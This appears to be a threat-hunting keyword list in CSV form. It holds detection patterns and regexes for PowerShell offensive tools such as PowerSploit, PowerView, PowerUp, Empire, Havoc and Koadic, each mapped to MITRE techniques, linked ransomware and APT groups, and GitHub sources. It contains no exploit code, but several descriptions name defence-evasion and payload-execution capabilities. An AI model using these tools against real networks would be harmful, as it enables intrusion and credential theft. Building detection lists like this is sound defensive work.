"*powershell-import*Invoke-Kerberoast.ps1*",".{0,1000}powershell\-import.{0,1000}Invoke\-Kerberoast\.ps1.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55280"
"*powershell-import*ShareFinder.ps1*",".{0,1000}powershell\-import.{0,1000}ShareFinder\.ps1.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55281"
"*PowershellKerberos-main*",".{0,1000}PowershellKerberos\-main.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/MzHmO/PowershellKerberos","1","1","N/A","N/A","9","4","328","44","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z","55282"
"*PowerShellMafia*",".{0,1000}PowerShellMafia.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55283"
"*PowerShellMafia/PowerSCCM*",".{0,1000}PowerShellMafia\/PowerSCCM.{0,1000}","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tool","https://github.com/PowerShellMafia/PowerSCCM","1","1","N/A","N/A","8","4","354","106","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z","55284"
"*PowerShellMafia/PowerSploit*",".{0,1000}PowerShellMafia\/PowerSploit.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55285"
"*PowerShellObfuscator.ps1*",".{0,1000}PowerShellObfuscator\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","55286"
"*PowerShellRunner*runner.ps1*",".{0,1000}PowerShellRunner.{0,1000}runner\.ps1.{0,1000}","offensive_tool_keyword","PowerShellRunner","PowerShell runner for executing malicious payloads in order to bypass Windows Defender","T1059.001 - T1562.001 - T1218.005","TA0002 - TA0005","N/A","Turla","Defense Evasion","https://github.com/dievus/PowerShellRunner","1","1","N/A","N/A","9","1","70","20","2021-11-22T18:43:16Z","2021-08-03T01:29:34Z","55287"
"*PowershellRunner.h*",".{0,1000}PowershellRunner\.h.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","55288"
"*PowerShellRunner_dll_len*",".{0,1000}PowerShellRunner_dll_len.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","55289"
"*PowerShellStager*",".{0,1000}PowerShellStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","55290"
"*PowerShell-Suite*",".{0,1000}PowerShell\-Suite.{0,1000}","offensive_tool_keyword","PowerShell-Suite","There are great tools and resources online to accomplish most any task in PowerShell. sometimes however. there is a need to script together a util for a specific purpose or to bridge an ontological gap. This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind.","T1059 - T1086 - T1140 - T1145 - T1216","TA0002 - TA0003 - TA0005","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/PowerShell-Suite","1","1","N/A","N/A","N/A","10","2659","769","2021-11-19T12:18:24Z","2015-12-11T13:14:41Z","55291"
"*PowershellTools-main.zip*",".{0,1000}PowershellTools\-main\.zip.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tool","https://github.com/gustanini/PowershellTools","1","1","N/A","N/A","10","1","76","13","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z","55292"
"*PowerShx.dll*",".{0,1000}PowerShx\.dll.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","55293"
"*PowerShx.exe*",".{0,1000}PowerShx\.exe.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","55294"
"*PowerShx.sln*",".{0,1000}PowerShx\.sln.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","55295"
"*PowerShxDll.csproj*",".{0,1000}PowerShxDll\.csproj.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","55296"
"*PowerShx-master*",".{0,1000}PowerShx\-master.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","55297"
"*PowerSploit*",".{0,1000}PowerSploit.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55298"
"*PowerSploit-*.zip*",".{0,1000}PowerSploit\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55299"
"*PowerSploit.*",".{0,1000}PowerSploit\..{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55300"
"*PowerSploit/releases*",".{0,1000}PowerSploit\/releases.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55301"
"*powerstager*",".{0,1000}powerstager.{0,1000}","offensive_tool_keyword","PowerStager","PowerStager: This script creates an executable stager that downloads a selected powershell payload.","T1105 - T1059.001 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","Resource Development","https://github.com/z0noxz/powerstager","1","1","N/A","N/A","N/A","2","184","48","2019-12-15T09:30:05Z","2017-04-17T12:13:31Z","55302"
"*PowerUp.ps1*",".{0,1000}PowerUp\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","PowerUp.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55303"
"*PowerUp.ps1*",".{0,1000}PowerUp\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","55304"
"*PowerUpSQL*",".{0,1000}PowerUpSQL.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","55305"
"*PowerUpSQL.ps1*",".{0,1000}PowerUpSQL\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55306"
"*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","55307"
"*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","55308"
"*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","55309"
"*powerview.ps1*",".{0,1000}powerview\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1078","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","55310"
"*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","55311"
"*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows net commands. which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality It also implements various useful metafunctions. including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist","T1087 - T1069 - T1064 - T1002 - T1552","TA0002 - TA0003 - TA0008","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55312"
"*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","55313"
"*PowerView.ShareInfo*",".{0,1000}PowerView\.ShareInfo.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","#content","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55314"
"*PowerView.SPNTicket*",".{0,1000}PowerView\.SPNTicket.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1","1","0","#content","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55315"
"*PowerView_dev.ps1*",".{0,1000}PowerView_dev\.ps1.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","Black Basta","Framework","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","N/A","","N/A","","","","55316"
"*PowerView-2.0-tricks.ps1*",".{0,1000}PowerView\-2\.0\-tricks\.ps1.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains","T1046 - T1087.001 - T1016","TA0007 - TA0008 - TA0009","N/A","Dispossessor - MAZE - Conti - XingLocker - Rhysida - BlackByte - Black Basta - MUSTANG PANDA","Discovery","https://github.com/anthonysecurity/redteam_toolkit/blob/master/References/PowerView-2.0-tricks.ps1","1","0","#content","https://vx-underground.org/Archive/Dispossessor%20Leaks","10","1","24","19","2018-08-23T11:18:21Z","2018-02-07T16:29:53Z","55317"
"*PowerView3-Aggressor*",".{0,1000}PowerView3\-Aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta 